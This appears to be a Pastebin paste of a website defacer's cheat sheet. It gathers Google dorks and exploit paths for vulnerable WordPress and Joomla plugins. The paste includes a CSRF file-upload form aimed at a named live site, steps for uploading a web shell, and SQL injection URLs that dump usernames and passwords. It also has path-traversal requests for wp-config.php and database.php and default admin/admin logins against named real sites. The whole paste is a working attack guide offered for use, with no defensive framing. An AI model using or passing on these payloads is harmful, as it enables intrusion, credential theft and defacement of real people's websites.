Guest User

Error

a guest
Jan 27th, 2018
39
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.18 KB | None | 0 0
  1. Deface with Plugins Reflex Gallery
  2. --------------------------------------------------------------------
  3. - Dork : inurl:/wp-content/plugins/reflex-gallery/
  4. - Exploit : wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php
  5. - Vuln : {"error":"No files were uploaded."}
  6. - Site Vuln : http://sjoyster.com/
  7. - Script CSRF :
  8. <html>
  9. <title>Reflex-Gallery CSRF</title>
  10. <form method="POST" action="http://straightlineinspection.com/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php" enctype="multipart/form-data" >
  11.  
  12. <input type="file" name="qqfile"><br>
  13.  
  14. <input type="submit" name="Submit" value="Pwn!">
  15.  
  16. </form>
  17. </html>
  18. ----------------------------------------------------------------------
  19.  
  20. Okay Lets Go to Tutorial
  21.  
  22. - Save script CSRF [ reflex.html ]
  23. - Change The Site , to site Vuln
  24. - Save
  25. - Chek The Vuln
  26. - Oh yeah , that vuln :D
  27. - Open The Script in the Browser
  28. - Upload your shell
  29. - bcc.php is my shell :)
  30. - Click " Pwn!"
  31. - Succses :D
  32. - Open your Shell in the :
  33. [ site.com/wp-content/uploads/shell.php
  34.  
  35. - T R A C Y
  36.  
  37. ++--+-+-+2exploit+-+/-+-+-/
  38. # Exploit: /index.php?option=com_spidercalendar&calendar_id=1
  39. ----
  40. Exploit : http://web/wp-content/plugins/revslider/temp/update_extract/exp.php
  41.  
  42. Dork :
  43.  
  44. inurl:wp-content/plugins/revslider/
  45.  
  46. inurl:revslider
  47.  
  48. inurl:revslider_admin.php
  49.  
  50. inurl:revslider_front.php
  51.  
  52. inurl:plugins/revslider/
  53.  
  54. intext:Powered by Revslider
  55.  
  56. intitle:"Index Of/ revslider"
  57.  
  58. intitle:"Index Of/wp-content/themes/revslider"
  59.  
  60. intitle:"Index Of/wp-content/plugins/revslider"
  61.  
  62. intitle:"Index Of/admin/revslider"
  63.  
  64. intitle:"Index Of/fr/revslider"
  65.  
  66. intitle:"Index Of/en/revslider"
  67.  
  68. intitle:"Index Of/us/revslider"
  69.  
  70. intitle:"Index Of/ar/revslider"
  71.  
  72. intitle:"Index Of/es/revslider"
  73.  
  74. intitle:"Index Of/de/revslider"
  75. -----
  76. Easy-exploit-joomla-Sites
  77. Dork:inurl:"index.php?option=com_simplephotogallery"
  78.  
  79.  
  80.  
  81. /index.php?option=com_simplephotogallery&view=images&albumid=-1+/*!uNiON*/+/*!SeLeCt*/+1,concat%28username,0x3a,password%29,3,4,5,6,7,8,9,10,11,12+from+jos_users--+
  82. -----
  83. Joomla Components (com_ignitegallery) SQL-Injection Vulnerabilities -
  84.  
  85. Dorks: inurl:com_ignitegallery , Exploits: /index.php?
  86. option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(username,char(58),password)UAH,4,5,6,7,8,9,10+from+jos_users--&Itemid=18
  87. -----
  88. Joomla Exploit : com maian15
  89.  
  90. Dork : "inurl:option=com_maian15"
  91.  
  92. Exploit:
  93.  
  94. /administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?
  95. -----
  96. Deface Metode Wordpress bazar Theme Arbitrary File Download Vulnerability
  97.  
  98. Dork: inurl:wp-content/themes/bazar/
  99. exploit: /wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
  100. -----
  101. exploit bypass admin
  102. inurl
  103. allinurl:galimg
  104. inurl:galorg
  105. index of /galorg site:ae
  106. target
  107. http://mspmt.com/adminaccess/welcome.asp
  108. http://www.extrememarineme.com/adminaccess/welcome.asp
  109. add
  110. adminaccess/welcome.asp
  111. user=admin pass=admin
  112. adminaccess/gallery.aspx
  113. upload your shell
  114. http://mspmt.com/
  115. -----
  116. Upload dork and exploit :3
  117. Dorks :
  118.  
  119. inurl:/upload.php
  120. inurl /uploadbutton.html
  121. inurl /upload-form.php
  122. inurl /upload/up.php
  123. inurl /upload.html
  124. -----
  125. Dokeos Upload
  126. 😊😊😊😊
  127. Dork:inurl:/index.php?include=Overview.html
  128. Exploit:/main/inc/lib/fckeditor/editor/plugins/ImageManager/manager.php
  129. -----😊😊😊😊
  130. Dork : inurl:"admin/my_documents/my_files"
  131. Exploit : admin/rte_popup_file_atch.asp
  132. -----
  133. Dork:inurl:"/mfm.php"
  134. -----
  135. Dork:intitle:"index of" people.lst.
  136.  
  137. dork : "Webdesign by: basicamente.pt"
  138.  
  139. [ Sitetarget.com/filemanager/dialog.php ] Upload Your File. Ur file [Sitetarget.com/uploads/yourfile.html]
  140. http://www.koochecinema.com/ckfinder/ckfinder.html
  141.  
  142.  
  143.  
  144.  
  145.  
  146.  
  147. # 1:Search Google Dork and Choose a Target Dork : inurl:viewtable?cid= site:it # 2: exploit: /index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0 # 3: upload shell.php or index.html
  148.  
  149. Exploit: /admin/include/download.php?path=../config/&file=database.php
  150.  
  151. [+] Dork: inurl:sele.php
  152.  
  153.  
  154.  
  155. DORK :
  156.  
  157. "Webdesign by: criativo.net"
  158. "Webdesign by: risema.pt"
  159. "Webdesign by: basicamente.pt"
  160.  
  161. EXPLOIT :
  162.  
  163. /filemanager/dialog.php
Add Comment
Please, Sign In to add comment